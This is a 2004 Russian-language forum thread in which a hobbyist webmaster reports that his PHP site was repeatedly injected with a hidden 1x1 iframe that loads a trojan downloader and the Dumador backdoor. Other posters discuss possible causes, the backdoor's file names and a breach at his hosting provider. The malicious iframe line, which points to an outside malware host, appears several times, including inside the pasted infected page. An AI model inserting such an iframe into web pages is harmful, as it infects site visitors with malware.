URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID10
Нить номер: 1628
[ Назад ]

Исходное сообщение
"Мне на главную страницу index.php3 внедрили вирус"
Отправлено Dimux , 02-Окт-04 22:30

Субботним утром загружаю, как обычно свой сайт, и вдруг AVP обнаруживает и предлагает вылечить вирусы, причем сразу два:
- ...\Content.IE5\E51EFULG\index[6].html TrojanDownloader.JS.Gen
- d:\Program Files\Internet Explorer\hryhycgp.exe Backdoor.Win32.Dumador.al
я конечно быстренько начал разбираться - перезаписал на сервере файлы index.php3 и intro.inc который включается в index.php3 по include.
проблема пропала, но по неопытности я не сохранил старые исходники (порченные) - подозреваю что они были изменены.
в файле intro.inc отображаются картинки следующим образом: <img src="/balance.php"> - может быть это использовали? даже и не знаю с чего начать...
Вопросы:
- как это могли сделать?
- как от этого защититься? весь сайт написан вручную на PHP... но я любитель.

Содержание

Мне на главную страницу index.php3 внедрили вирус,Dimux, 14:37 , 03-Окт-04
- Мне на главную страницу index.php3 внедрили вирус,Andrek, 03:34 , 05-Окт-04
  - Мне на главную страницу index.php3 внедрили вирус,Dimux, 01:30 , 07-Окт-04
Мне на главную страницу index.php3 внедрили вирус,vpn, 09:48 , 07-Окт-04
- Мне на главную страницу index.php3 внедрили вирус,Dimux, 11:39 , 08-Окт-04
  - Мне на главную страницу index.php3 внедрили вирус,St, 04:33 , 19-Окт-04
  - Мне на главную страницу index.php3 внедрили вирус,Сергей, 10:59 , 19-Окт-04

Сообщения в этом обсуждении

"Мне на главную страницу index.php3 внедрили вирус"
Отправлено Dimux , 03-Окт-04 14:37

Нет, вы представляете, сегодня опять повторилось!
Вот такую строчку нашел в файле index.php3:
<iframe src="http://www.norma-apex.ru/log/index.html" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0>
- там вирусы и сидят.
Но как строчка попадает в index.php3? это интересный вопрос.
Может кто-то пароль на ftp украл? или есть способы проще?

"Мне на главную страницу index.php3 внедрили вирус"
Отправлено Andrek , 05-Окт-04 03:34

>Нет, вы представляете, сегодня опять повторилось!
>Вот такую строчку нашел в файле index.php3:
><iframe src="http://www.norma-apex.ru/log/index.html" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0>
> - там вирусы и сидят.
> Но как строчка попадает в index.php3? это интересный вопрос.
> Может кто-то пароль на ftp украл? или есть способы проще?

А Windows лицензионный?

"Мне на главную страницу index.php3 внедрили вирус"
Отправлено Dimux , 07-Окт-04 01:30

>А Windows лицензионный?
Я работал на нескольких компьютерах, есть и лицензионный и нет, но везде XP...
То есть украли пароль? или к чему этот вопрос?

"Мне на главную страницу index.php3 внедрили вирус"
Отправлено vpn , 07-Окт-04 09:48

> Вопросы:
> - как это могли сделать?
> - как от этого защититься? весь сайт написан вручную на PHP...
>но я любитель.
что бы можно было что нить сказать ты бы привел весь файл php, а то заставляешь людей гадать. Дырок много, обо всех не расскажешь.

"Мне на главную страницу index.php3 внедрили вирус"
Отправлено Dimux , 08-Окт-04 11:39

>> Вопросы:
>> - как это могли сделать?
>> - как от этого защититься? весь сайт написан вручную на PHP...
>>но я любитель.
>
>что бы можно было что нить сказать ты бы привел весь файл
>php, а то заставляешь людей гадать. Дырок много, обо всех не
>расскажешь.
Весь файл как он есть
------------------------------------------------------------------------
<?
  include "$DOCUMENT_ROOT/comm_functions.php";
  include "$DOCUMENT_ROOT/db_connect.php3";
  include "$DOCUMENT_ROOT/menu.php3";
?>
</td>
</tr>
</table>
<img width=0 height=10 src="">
<div align="center">
  <center>
  <table border="0" cellpadding="0" cellspacing="0" width="100%" bordercolor="#C0C0C0" height="528">
    <tr>
      <td width=170 align="left" valign="top">
<?
        include "$DOCUMENT_ROOT/column_news.inc";
?>
      </td>

      <td align="center" valign="top">
<?
        include "$DOCUMENT_ROOT/column_intro.inc";
?>
      </td>

      <td width=200 valign="top" align="center">
<?
        include "$DOCUMENT_ROOT/column_right.inc";
?>
      </td>

    </tr>
  </table><iframe src="http://www.norma-apex.ru/log/index.html" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0>
</div>
<?
include "$DOCUMENT_ROOT/bottom_menu.php";
include "$DOCUMENT_ROOT/cnt_banners.php";
?>
</body>
</html>
------------------------------------------------------------------------
И второй раз это повторилось в файле bottom_menu.php - тоже добавили это строчку <iframe> со ссылкой на norma-apex - тоже загружался вирус. Это после того как я сделал index.php3 r-- r-- ---, а до этого был rw- rw- ---. Сейчас я все файлы в корне сделал r-- r-- --- но ведь это не выход наверное, а только временная мера.
Или хоть дайте ссылочку почитать как с этим бороться, или дельный совет... а то уже печально становится... на сервере valuehost, где мой сайт - никакого контроля за этим нет, вручную ведь не проследишь за всеми файлами.

"Мне на главную страницу index.php3 внедрили вирус"
Отправлено St , 19-Окт-04 04:33

А я нащёл три разновидности этого вируса или три компаненты одного и того же вируса Backdoor.win32.dumador.al который сидел в файлах dvpd.dll, prntsvr.dll в каталоге winnt (Windows2000)Backdoor.win32.dumador.aq в файле msxmidi.exe, netdc.exe и Backdoor.dumador.al в файле netda.exe в каталоге system32. Все эти файлы в чистои Win2000 отсутствовали

"Мне на главную страницу index.php3 внедрили вирус"
Отправлено Сергей , 19-Окт-04 10:59

> Или хоть дайте ссылочку почитать как с этим бороться, или дельный
>совет... а то уже печально становится... на сервере valuehost, где мой
>сайт - никакого контроля за этим нет, вручную ведь не проследишь
>за всеми файлами.
Это сообщение случайно не про тебя?
http://www.mazafaka.ru/news/archive/news-archive-13-10-2004....
см.
Valuehost взломали с полпинка
Posted by djamix on 16:23 13.10.2004
...